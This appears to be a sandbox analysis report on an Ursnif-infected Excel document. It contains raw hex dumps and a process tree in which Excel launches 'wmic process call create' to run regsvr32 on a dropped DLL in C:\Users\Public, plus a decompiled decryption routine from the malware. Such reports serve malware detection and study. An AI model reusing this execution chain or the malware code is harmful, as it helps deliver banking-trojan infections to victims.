74 ab 85 85 68 a0 ff 00 ff 51 86 8b ff 5a c6 00
                                  Data Ascii: {s#3%GtTy;dy{DYF',BpU>"9(FID.kOU*SaJM'^;V=6m>^\thQZ
                                  2021-10-21 17:40:39 UTC234INData Raw: 00 00 76 74 07 97 6b 3c 86 b3 b8 e2 b6 72 00 00 00 0b 0b 01 01 42 68 8c 57 79 17 00 00 00 00 00 00 05 05 b5 82 0a 4c f3 53 41 ff ff 00 00 0a 0a 06 06 00 00 ff 31 16 ff 0e 1a 9c f1 03 77 32 29 ff 00 00 ff ff 07 07 06 06 ff ff 08 fe 32 f0 24 43 94 e7 3e 81 31 db 4e cb dc 08 08 08 08 08 00 00 00 e6 fe ff c2 39 00 04 04 00 00 a6 13 ea 30 72 4d 78 5c 2d ff ff 00 00 00 00 00 00 00 2e 0b 3c 70 b1 00 ff ff 08 08 00 00 ff ff ff ff 00 00 00 00 10 90 de 41 d4 41 9c 00 00 00 00 00 00 00 e1 f8 20 59 23 53 ca 8d 8e 00 06 06 00 00 00 00 08 8f ee 2a 2b 28 75 35 3a 08 00 00 00 00 00 00 00 00 02 02 3b fc fd b6 fa 72 71 70 31 f5 f4 f7 03 03 00 00 00 00 00 00 ff ff 00 00 f6 7b c1 2e 0b c1 00 00 00 00 00 00 0a 0a e1 1c 46 45 46 47 40 00 00 00 00 00 d5 bb b8 b9 55 3d bd 57 e2
                                  Data Ascii: vtk<rBhWyLSA1w2)2$C>1N90rMx\-.<pAA Y#S*+(u5:;rqp1{.FEFG@U=W
                                  2021-10-21 17:40:39 UTC242INData Raw: 7c 85 49 4f 72 ad 85 ff 85 96 fe ff 4a 96 51 96 95 fe c2 fe 86 86 97 86 50 53 fe fe 96 ff fe 96 d9 95 d3 fe 00 96 50 34 85 89 49 49 c9 96 ff d3 88 4a 77 86 be be aa fe 96 fe 91 95 ff a7 ff 5a 35 89 ff a9 3b 95 fe 49 86 4c 86 fe 00 65 95 ff c3 fe ff be ce fe fe fe 86 b0 4b 85 a7 96 ff 85 51 6b ff b1 6f 4a 96 ff a3 49 ad d4 fe fe 9b ff 63 be bd 51 ff 2c be fe c6 ff fe be 89 85 34 ff 00 d3 d4 4a 00 fe 00 b4 3a 95 ff 66 83 ff 95 d3 fe da 4a ff ff 3b 8c d4 3b d3 ff 96 86 3b b6 ca ff 85 85 85 96 a7 ac d9 4e aa 4a ff bd 4a 34 85 fe 96 6f fe fe ff 00 96 fe ff 3a 86 ff 4d ff 49 95 ff bd 7c a1 ff fe d4 ff 2d fe 52 49 9b ff 96 fe 7e 30 d3 7f 86 3a bd 95 ff 86 86 ff 4a 50 49 86 99 ff 51 95 fe 00 fe 85 78 ff 85 5f d4 da 49 fe ff bd 00 86 95 bb 85 ff 91 85 96 bb 7e 85
                                  Data Ascii: |IOrJQPSP4IIJwZ5;ILeKQkoJIcQ,4J:fJ;;;NJJ4o:MI|-RI~0:JPIQx_I~
                                  2021-10-21 17:40:39 UTC250INData Raw: 00 ff ff ff ff 07 07 3c 5c b2 d3 ff f6 2c dd ff ff 00 00 0b 0b 07 07 04 04 00 00 ff ff 00 22 43 f3 bd f1 1f 2a 1b 89 88 5d c0 00 00 00 ff ff 0b 0b a0 5e 4b a3 9c 91 00 00 0a 0a 00 00 0a 0a fe cb 7d 7e f3 47 fb 07 07 00 00 0a 0a 08 08 00 00 00 d7 c5 6e 68 4e 2c 79 6a 01 14 dd 00 00 00 00 00 02 02 ff ff ff ff 0a 6f 00 a9 0f 7d 08 7e 67 22 ac fa 9b 3b ec 0a 00 00 00 00 00 00 00 88 ac f1 51 ef 00 07 07 00 00 cb 99 95 f4 28 1d 94 77 4a 00 00 07 07 00 00 07 07 00 87 6a 90 8e 17 00 00 00 07 07 01 01 ff ff 07 07 ff ff 00 00 b5 c1 94 54 49 0e fe ff ff 00 00 00 00 00 c8 b3 18 d0 32 2f 96 d9 bd 00 00 00 0a 0a 04 04 0b 35 f5 aa a3 fa cb ac 6e 0b 00 00 08 08 00 00 00 00 01 01 af 73 44 a8 fb 7c 2f d4 e5 df 60 59 00 00 00 00 09 09 ff ff 00 00 00 00 83 17 42 12 07 83 00
                                  Data Ascii: <\,"C*]^K}~GnhN,yjo}~g";Q(wJjTI2/5nsD|/`YB
                                  2021-10-21 17:40:39 UTC258INData Raw: 00 00 00 f0 ec 30 d6 50 ff ff 01 01 ff f1 90 ea e7 a7 94 67 02 9d ff 00 00 06 06 ff ff 00 00 7c bf 89 72 9e 00 00 06 06 01 01 06 06 00 00 0b 0b 08 08 00 71 0d e4 0b 27 95 d8 00 00 00 00 00 07 07 93 76 73 fe 52 7f d7 c6 27 00 00 00 00 ff ff 00 00 cf 80 b0 4c 81 3f 5a 93 00 00 00 00 00 00 00 00 00 00 00 50 00 fc 00 18 eb fb eb ef 4d 32 79 00 00 00 00 00 00 00 00 00 00 00 00 53 92 54 fe 35 32 00 00 00 07 07 ff ff 0b b8 ec a4 47 e6 5a b6 0b 00 00 00 00 37 ad 1c 32 57 b7 2d 0a 15 a8 e1 05 05 00 00 0a 0a 00 00 00 de 0e ec 76 25 97 1c 9f d5 89 c9 81 df d9 00 06 06 00 00 00 00 00 00 00 00 04 04 00 00 26 69 2e cc 61 00 00 00 00 00 00 ff db 10 46 87 ea e0 0c 8e 5b ff 00 00 00 00 00 00 00 36 26 a9 06 88 00 01 01 07 07 ff ff 04 04 08 08 1a b4 9b a0 52 d5 40 03 03 00
                                  Data Ascii: 0Pg|rq'vsR'L?ZPM2yST52GZ72W-v%&i.aF[6&R@
                                  2021-10-21 17:40:39 UTC266INData Raw: a5 78 95 49 49 fe c9 da 8f d3 bd 4e 78 85 00 94 4e 49 00 ce 6e 95 fe 95 ff 49 ff be ff ac 4a ff 4a 86 4a fe 8a fe 99 fe ff 4e d4 78 fe 86 2d 77 86 ff 00 ff 97 5c ff d3 81 b2 fe 49 3e 96 49 95 95 50 bd bb fe 72 86 90 ff 96 d4 d3 be bd 5e ff 52 fe ff 95 49 52 d3 c8 49 ba ff ac d3 b9 96 49 86 49 be 96 86 da ff c3 00 8c 5f 77 a9 4a fe ff 7a be fe 9c 78 85 96 4a fe 49 bb 86 50 ff 52 63 6f 49 95 be 49 51 9d be 34 4a 8d bb 4e c3 77 9f ff ff fe 85 85 be ff 78 95 3a 86 fe 4a ff d3 ff 87 d3 ff fe b8 95 ff 86 d4 b3 4a d4 87 8e be 49 fe 85 85 fe 96 fe d4 a1 d4 50 81 78 6b 96 4a 8e 9d 4a 7b 6b 7c 3a 96 d4 6f c7 ba bd 49 bd ff ff 9a 84 4a fe 4a 96 68 39 fe 49 49 b6 49 3b fe 49 d4 d3 fe 6d 96 be 5c 42 49 fe fe 4c ff 96 95 d4 86 a7 6c ff 86 ff b6 00 ba ff da fe ff 85 00
                                  Data Ascii: xIINxNInIJJJNx-w\I>IPr^RIRIII_wJzxJIPRcoIIQ4JNwx:JJIPxkJJ{k|:oIJJh9III;Im\BILl
                                  2021-10-21 17:40:39 UTC273INData Raw: ff 75 55 ff 73 d9 ff fe 95 86 fe 49 ff d3 da d9 bd 6b 74 4a be 86 96 95 00 ad ff 00 6c d3 4a ff 86 8f 85 b4 ff 34 96 ff 94 2b 6b 96 ff 34 ff fe 97 82 be bd bc da aa 95 49 4a ff 8d 00 4a 49 ff be ff 4a a9 86 49 96 85 ff 00 d4 49 86 b8 35 b5 86 49 ff ff 91 86 d3 ff 6c d4 95 9d b8 00 ff c3 85 95 86 4d ff 6c 95 6e 86 50 7f 5a a3 5c fe fe ff 86 85 e7 ff ff 4a 8d fe 49 ff 5a bd 4a fe d3 3a 95 d9 d3 86 7f 2d da 4e 4e 00 96 86 96 ff da da 86 49 d3 85 00 95 3f 96 ff 49 fe 96 ff 40 95 b4 00 fe 82 96 4a 7d b1 68 ff 95 4a fe 4a 85 96 d4 b7 4a ff 6e ff 6f 00 be 6b 96 ff fe fe bd fe 93 4a 89 5c ff 6a 4a 3a d3 79 d4 bc fe ce 6f 4a 85 99 ff 96 ff 49 be 80 ba 85 86 6a ff a9 ce da 8a ff 00 ff 00 b3 56 be d4 51 78 d0 7d ff fe 00 98 5e 85 fe a0 85 c6 72 00 fe be b2 52 c3 3b
                                  Data Ascii: uUsIktJlJ4+k4IJJIJII5IlMlnPZ\JIZJ:-NNI?I@J}hJJJnokJ\jJ:yoJIjVQx}^rR;
                                  2021-10-21 17:40:39 UTC281INData Raw: fe d3 a9 96 96 50 4a af 75 4a ff 4b 96 85 fe 85 fe 96 86 fe bd da 86 6a 8e 86 ff af fe d3 60 4f d3 86 86 96 95 ff b6 85 63 bd fe bf 96 92 97 96 fe fe 65 fe 6b 40 ff ff 85 86 7b da a7 85 d9 da 7a 00 fe cc ff 4a bd fe ff 96 d3 96 ba 50 45 4a 6b 95 fe b4 d3 43 95 96 49 ff 4a d3 fe ff 86 fe ff 86 2a ff fe 4f be 4a 50 6b 52 ff ff fe 3a 84 86 96 96 86 fe 51 fe 86 00 fe fe ff 86 95 4a 4a ff 96 42 50 80 2d d4 95 ab cb 00 ff 86 ac 96 49 72 a1 6c 96 6c 85 ff 86 6c ff 56 49 d3 da 96 ff 5c bd fe ff ff 50 4a c7 fe 52 49 fe ff 85 49 ff 95 ff 95 4a fe ff b6 fe 4a d4 ff ff a4 20 95 a7 4b fe 4a 93 95 86 4a 4d fe 49 fe 85 95 85 6b 4a 5a d0 ff fe fe d4 d4 fe 50 b8 fe ff 86 bb d4 ff ab ff fe 51 fe be 95 5a 88 96 be fe 96 49 86 7a d9 da 86 00 00 50 a1 96 9f 58 ff ff b7 86 2d
                                  Data Ascii: PJuJKj`Ocek@{zJPEJkCIJ*OJPkR:QJJBP-IrlllVI\PJRIIJJ KJJMIkJZPQZIzPX-
                                  2021-10-21 17:40:39 UTC289INData Raw: 96 d3 86 ff ff 85 49 86 a6 2d fe 49 fe 3e 4a 95 50 00 ff 4a 95 6d 00 96 4a 49 4c fe 82 ff 95 4a de 86 89 ff fe 8e 6c fe 86 00 bd 49 cc fe ff 8d 00 85 84 c4 4a 89 bd 4a d3 fe ff ff 00 2d fe 4a 85 85 4a fe 62 85 a9 85 fe 4a 56 4a ff 47 96 5a fe c6 96 ff d4 4d 00 ff d6 95 4a a5 95 a4 86 86 bd 4a fe ff 96 86 00 b4 4a ad 49 ad 49 ff fe 7e 9c d4 ff 78 6a da ff fe fe 96 96 d4 49 95 4a 96 77 6b a3 00 96 4a fe ff fe 84 cb c3 d3 96 34 e6 49 49 d4 4e bf 4a ff 9f d4 4a ff fe a9 96 3a 86 2d ab 96 94 9f aa 95 d9 fe a6 d3 ff ff 85 00 ff 96 ff d9 3e c6 86 96 da d3 b6 be bd fe 4a d9 cf ff 86 66 ff 6a 5f 99 51 4a 6b 4a fe d4 be 51 96 d4 fe a1 95 be a7 ff ff 00 ff d3 62 35 00 95 2a 85 a7 ba 2c c9 9c d4 95 da ff 4a 4a 4a ff 86 fe 8c 3b ff ff ff 85 d3 fe fe 4a d9 ff ba 9a ac
                                  Data Ascii: I-I>JPJmJILJlIJJ-JJbJVJGZMJJJII~xjIJwkJ4IINJJ:->Jfj_QJkJQb5*,JJJ;J
                                  2021-10-21 17:40:39 UTC297INData Raw: ff 49 86 ff ff 3a 96 49 85 bb 95 d4 66 fe 00 4a 51 83 ad 6b bd b3 9b ff 78 4d 00 fe d9 c8 76 ff 86 99 85 6b 86 3b 00 d9 d9 96 fe fe fe fe be 91 ff fe 4a fe 49 ba e6 5a d3 fe 3a ff ca 6b d4 4a 4a ff 96 4a ff ff ff 4c ff 99 4a 49 4e 78 ff 86 8a 49 ff a4 6f dc ff 96 85 7e 85 85 82 fe 49 ff b4 3b 95 ff ba 00 00 00 95 fe 4d ff 90 86 96 ff 6c 95 ff fe 4a 95 86 4a ff 3b 49 bd ff fe 95 86 ff 4b ff ff ff 00 d0 49 3b 86 4a fe be 4a 5f da 86 3a 95 a7 c1 c8 fe 00 ff 6b fe 49 8e dc 4a 95 00 85 4a a9 95 d9 85 95 ac 78 85 86 39 68 ff 95 ff fe 4a ff 6c 4a 4a d4 74 86 c9 ff 8b 49 d6 b4 4a ff 00 ff c1 86 fe d9 4a ff fe 4a 96 2d 4a ff 9f ff 49 00 fe d3 49 ff 85 fe 4a ff 00 75 86 4a 95 ff 50 95 6e 00 fe 85 84 4a 4f 96 86 95 86 ff d9 ff e7 50 82 5b da be 49 4c be 78 ff 96 5a
                                  Data Ascii: I:IfJQkxMvk;JIZ:kJJJLJINxIo~I;MlJJ;IKI;JJ_:kIJJx9hJlJJtIJJJ-JIIJuJPnJOP[ILxZ
                                  2021-10-21 17:40:39 UTC305INData Raw: 95 ff 7c ff fe 7d a1 ff a1 da 9c 51 ba 86 86 49 ff 85 00 49 4a ff fe 87 3a 4a 82 ff d9 d4 95 95 4d 95 ff d9 86 a3 4a be 96 96 85 bb fe ff 86 7c 70 85 6b 95 95 85 ff 60 95 fe ac d3 fe 49 ab 96 4a fe 85 fe 4f 6a ad 96 ff 86 fe 73 8e 42 6f 49 fe 4c d4 a5 c4 46 bd a9 68 d9 65 5f ff fe fe 85 49 6d 4a 51 bb 3b ff 00 86 97 c9 fe fe 49 3b d3 86 90 85 7c 9f 00 ff 49 d4 ff d4 86 96 d4 51 d3 d4 49 00 6b 85 fe fe d4 ff a7 96 4e 50 4a 78 da 7c 4a 8f 95 fe 4d 86 ff 49 fe 51 85 85 fe 85 ff fe 9d ba 75 4a fe 89 52 45 96 91 85 96 4a d4 ff 86 8e 86 50 d4 97 4a be d3 d4 aa fe fe 9b 4a 50 4a 85 4a 49 ff 85 ff 6c 85 96 af ff 96 7c fe 85 86 52 ff ab ab 5d 78 95 49 b6 95 8f c7 85 95 4a 96 6b ff fe fe 78 da 94 4a fe fe 69 ff 4e ff 6c 86 d4 96 85 6e ff 4f a7 fe da fe 4a 96 6b 95
                                  Data Ascii: |}QIIJ:JMJ|pk`IJOjsBoILFhe_ImJQ;I;|IQIkNPJx|JMIQuJREJPJJPJJIl|R]xIJkxJiNlnOJk
                                  2021-10-21 17:40:39 UTC313INData Raw: 95 da be b0 34 93 95 ff d9 fe a0 3b 78 00 85 b4 86 9c 9d 3b 4a fe ff 3f 00 86 ff b6 96 78 fe 8e fe 95 be d9 4a a4 fe 00 92 00 bd 49 00 00 ff 96 b6 86 d7 4a fe 5a 49 2d 4f 4a 49 95 85 82 fe 85 49 66 85 ff 95 7c 66 8e 96 7e 89 85 ff 85 4a fe d9 ff 8b 4a 4d fe 4a d3 ff ff 96 dd fe 00 7c 00 4a a7 49 e6 4a 49 9f d3 95 ff d4 5b 73 ff 95 6b 42 fe ae 82 86 ff 85 95 96 96 b3 97 5f 96 54 77 86 bd 49 85 ff d3 4e ff bc 95 ff 85 b8 a7 fe 86 85 96 95 d9 96 95 55 95 85 ff 3e bb 98 d3 8e 77 ff 87 dc cb 49 7a 99 86 84 da fe da fe 95 8c c1 96 95 90 85 93 9d b4 ff ff 4a be fe 95 4a d4 7c 86 86 6f 49 bf ff d9 78 4a 85 00 fe a5 95 b2 ff c0 96 fe 96 4c be 85 ff ff 50 ff ac da fe fe ba 96 be fe 86 3f fe a9 85 ff ff fe ff bd 50 ff 4a d9 49 ff bd fe ff ac 80 3a 96 95 86 ff 86 fe
                                  Data Ascii: 4;x;J?xJIJZI-OJIIf|f~JJMJ|JIJI[skB_TwINU>wIzJJ|oIxJLP?PJI:
                                  2021-10-21 17:40:39 UTC320INData Raw: bc 96 ff d4 d4 6c fe 95 95 d4 4c 86 9c 86 86 ff 49 da d4 95 50 c4 20 95 fe 3b bf bd fe 4a d4 4a 3b 00 95 d6 86 da 52 96 96 00 85 a7 bd d9 00 7a ca 00 af ff ff b4 86 d4 49 6b 82 96 d4 95 94 93 a2 49 fe 00 51 ca ba b4 96 be 78 4e d6 2e 00 b4 86 bd ff 5a 4a d3 fe 95 4c fe 80 9c 49 ff fe ff ff 95 86 da fe 97 fe 6b 96 ff 6a b4 00 51 d3 fe 96 4a 4a bd 6f d1 34 00 be fe 8c 4a ff 71 00 da ad d9 fe 49 95 ff fe 86 4a 7f 96 ab fe 95 67 4a 3f 80 6c 4a fe c2 00 c7 b2 ff ff 96 95 00 fe bc ce d4 ba da 86 96 49 a7 86 fe 50 ff 00 96 ff a4 3b 78 85 4a 00 8e 50 82 d3 ff 70 4a 96 b3 4a 86 aa fe fe fe d9 fe 00 b8 4a fe 95 3a d4 be da ff fe c3 49 4a ff 49 aa 77 d4 95 b2 46 96 4c ff d4 fe 95 86 8d 95 ff ff d3 be d3 be 85 86 95 51 8a 95 d3 fe 52 be bb 95 58 00 c1 96 96 fe 4a 78
                                  Data Ascii: lLIP ;JJ;RzIkIQxN.ZJLIkjQJJo4JqIJgJ?lJIP;xJPpJJJ:IJIwFLQRXJx
                                  2021-10-21 17:40:39 UTC328INData Raw: fe 95 49 fe ba ff be 4a ff ff 75 ff ff 85 86 ae 85 9f ff 49 00 ff fe d4 5f bc 4a 96 00 00 ff 96 4a 6c fe ff 85 be fe ff 95 fe 5c 4a ff c5 ff fe 6b ff 79 4a 95 fe a7 fe 42 74 c9 54 6c fe 3b 00 49 6c ff 95 49 d9 85 ff ff fe 66 4a 00 85 be ff 85 ff d4 6e fe 49 d4 95 fe 86 49 8b 49 95 bd ff ff 86 86 fe be ff 3b 2b d4 d4 bd fe 6f 51 bb 95 ff ff a7 fe a2 fe ff ff ff d9 d9 87 49 4a 4f d3 89 5c 8c 4d 49 8e 60 80 85 fe 5f a2 bf fe 50 3b 96 fe 85 45 6b 6c ff cd 85 4a 4c e7 85 d3 fe 85 fe fe b2 d3 4a a3 ff da fe fe 6c fe ff 85 ff 95 4a 75 b3 fe 86 8a 85 3a 95 bf b6 fe 96 bd 86 be 3b fe 96 a0 d4 ff 9f ff 85 ff ff fe ff ff fe 85 79 ff 00 86 75 d4 be ff 4a 73 ce ff fe 00 bd 85 9d fe fe 86 89 42 49 d4 86 bd 86 00 95 da b8 4a 00 fe 91 ff 8f fe ff fe 86 bb 49 c8 4a fe fe
                                  Data Ascii: IJuI_JJl\JkyJBtTl;IlIfJnIII;+oQIJO\MI`_P;EklJLJlJu:;yuJsBIJIJ
                                  2021-10-21 17:40:39 UTC336INData Raw: 51 75 65 72 79 56 61 6c 75 65 45 78 57 00 00 fc 01 4f 70 65 6e 54 68 72 65 61 64 54 6f 6b 65 6e 00 fb 01 4f 70 65 6e 53 65 72 76 69 63 65 57 00 00 c8 02 53 74 61 72 74 53 65 72 76 69 63 65 43 74 72 6c 44 69 73 70 61 74 63 68 65 72 57 00 61 02 52 65 67 4f 70 65 6e 4b 65 79 45 78 57 00 77 01 49 6e 69 74 69 61 6c 69 7a 65 53 65 63 75 72 69 74 79 44 65 73 63 72 69 70 74 6f 72 00 00 20 01 46 72 65 65 53 69 64 00 f7 01 4f 70 65 6e 50 72 6f 63 65 73 73 54 6f 6b 65 6e 00 00 7e 02 52 65 67 53 65 74 56 61 6c 75 65 45 78 57 00 00 88 02 52 65 67 69 73 74 65 72 53 65 72 76 69 63 65 43 74 72 6c 48 61 6e 64 6c 65 72 57 00 da 00 44 65 6c 65 74 65 53 65 72 76 69 63 65 00 a6 02 53 65 74 45 6e 74 72 69 65 73 49 6e 41 63 6c 57 00 00 c0 02 53 65 74 53 65 72 76 69 63 65 53 74
                                  Data Ascii: QueryValueExWOpenThreadTokenOpenServiceWStartServiceCtrlDispatcherWaRegOpenKeyExWwInitializeSecurityDescriptor FreeSidOpenProcessToken~RegSetValueExWRegisterServiceCtrlHandlerWDeleteServiceSetEntriesInAclWSetServiceSt
                                  2021-10-21 17:40:39 UTC344INData Raw: 38 0c 38 10 38 14 38 18 38 1c 38 20 38 24 38 28 38 2c 38 30 38 34 38 38 38 3c 38 40 38 44 38 48 38 4c 38 50 38 54 38 58 38 5c 38 60 38 64 38 68 38 6c 38 70 38 74 38 78 38 7c 38 80 38 84 38 88 38 8c 38 90 38 94 38 98 38 9c 38 a0 38 a4 38 a8 38 b4 38 b8 38 bc 38 c0 38 c4 38 c8 38 cc 38 d0 38 d4 38 d8 38 dc 38 e0 38 e4 38 e8 38 ec 38 f0 38 f4 38 f8 38 fc 38 00 39 04 39 08 39 0c 39 10 39 14 39 18 39 1c 39 20 39 24 39 28 39 2c 39 30 39 34 39 38 39 3c 39 40 39 44 39 48 39 4c 39 50 39 54 39 58 39 5c 39 60 39 6c 3f 74 3f 7c 3f 84 3f 8c 3f 94 3f 9c 3f a4 3f ac 3f b4 3f bc 3f c4 3f cc 3f d4 3f dc 3f e4 3f ec 3f f4 3f fc 3f 00 00 03 00 ac 01 00 00 04 30 0c 30 14 30 1c 30 24 30 2c 30 34 30 3c 30 44 30 4c 30 54 30 5c 30 64 30 6c 30 74 30 7c 30 84 30 8c 30 94 30 9c 30
                                  Data Ascii: 888888 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|888888888888888888888888888888899999999 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9l?t?|?????????????????0000$0,040<0D0L0T0\0d0l0t0|00000


                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  Analysis Process: EXCEL.EXE PID: 1592 Parent PID: 596

                                  General

                                  Start time:19:41:16
                                  Start date:21/10/2021
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                  Imagebase:0x13fdb0000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: WMIC.exe PID: 2032 Parent PID: 1592

                                  General

                                  Start time:19:41:20
                                  Start date:21/10/2021
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'
                                  Imagebase:0xff4a0000
                                  File size:566272 bytes
                                  MD5 hash:FD902835DEAEF4091799287736F3A028
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Chronological Activities

                                  Analysis Process: regsvr32.exe PID: 836 Parent PID: 1304

                                  General

                                  Start time:19:41:22
                                  Start date:21/10/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:regsvr32 -s C:\Users\Public\codec.dll
                                  Imagebase:0xffda0000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: regsvr32.exe PID: 1836 Parent PID: 836

                                  General

                                  Start time:19:41:23
                                  Start date:21/10/2021
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline: -s C:\Users\Public\codec.dll
                                  Imagebase:0x3e0000
                                  File size:14848 bytes
                                  MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  Chronological Activities

                                  Disassembly

                                  Code Analysis

                                  Reset < >

                                    Analysis Process: regsvr32.exe PID: 1836 Parent PID: 836 regsvr32.exeCOMMON

                                    Executed Functions

                                    Function 001A3FAB, Relevance: 18.2, APIs: 12, Instructions: 163encryptionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 50%
                                    			E001A3FAB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x1aa0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					if(CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12) == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x1aa0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E001A77D7(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x1aa0b0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x1aa0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E001A77EC(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}





























                                    0x001a3fb4
                                    0x001a3fba
                                    0x001a3fbd
                                    0x001a3fc3
                                    0x001a3fc3
                                    0x001a3fc5
                                    0x001a3fc7
                                    0x001a3fca
                                    0x001a3fd0
                                    0x001a3fd1
                                    0x001a3fd2
                                    0x001a3fd8
                                    0x001a3fdd
                                    0x001a3fe3
                                    0x001a3feb
                                    0x001a4148
                                    0x001a3ff1
                                    0x001a3ff3
                                    0x001a3ffc
                                    0x001a4001
                                    0x001a4013
                                    0x001a4016
                                    0x001a401a
                                    0x001a4021
                                    0x001a402d
                                    0x001a4133
                                    0x001a4033
                                    0x001a4033
                                    0x001a4037
                                    0x001a4038
                                    0x001a403a
                                    0x001a4045
                                    0x001a411f
                                    0x001a404b
                                    0x001a404b
                                    0x001a404e
                                    0x001a4054
                                    0x001a405a
                                    0x001a405a
                                    0x001a4062
                                    0x001a4066
                                    0x001a4069
                                    0x001a4110
                                    0x001a406f
                                    0x001a4075
                                    0x001a4078
                                    0x001a407b
                                    0x001a407d
                                    0x001a4080
                                    0x001a4083
                                    0x001a4085
                                    0x001a4085
                                    0x001a408f
                                    0x001a4094
                                    0x001a4097
                                    0x001a409a
                                    0x001a409c
                                    0x001a40a5
                                    0x001a40cf
                                    0x001a40a7
                                    0x001a40b8
                                    0x001a40b8
                                    0x001a40d7
                                    0x00000000
                                    0x00000000
                                    0x001a40d9
                                    0x001a40dc
                                    0x001a40df
                                    0x001a40e3
                                    0x00000000
                                    0x001a40e5
                                    0x001a40f4
                                    0x001a40fa
                                    0x001a4102
                                    0x001a4102
                                    0x00000000
                                    0x001a40e3
                                    0x001a40e7
                                    0x001a40ef
                                    0x001a40f2
                                    0x001a4109
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a40f2
                                    0x001a4069
                                    0x001a4122
                                    0x001a4125
                                    0x001a4125
                                    0x001a413a
                                    0x001a413a
                                    0x001a4152

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,001A48AF,00000001,001A72E3,00000000), ref: 001A3FE3
                                    • memcpy.NTDLL(001A48AF,001A72E3,00000010,?,?,?,001A48AF,00000001,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000), ref: 001A3FFC
                                    • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 001A4025
                                    • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 001A403D
                                    • memcpy.NTDLL(00000000,00000000,032F9858,00000010), ref: 001A408F
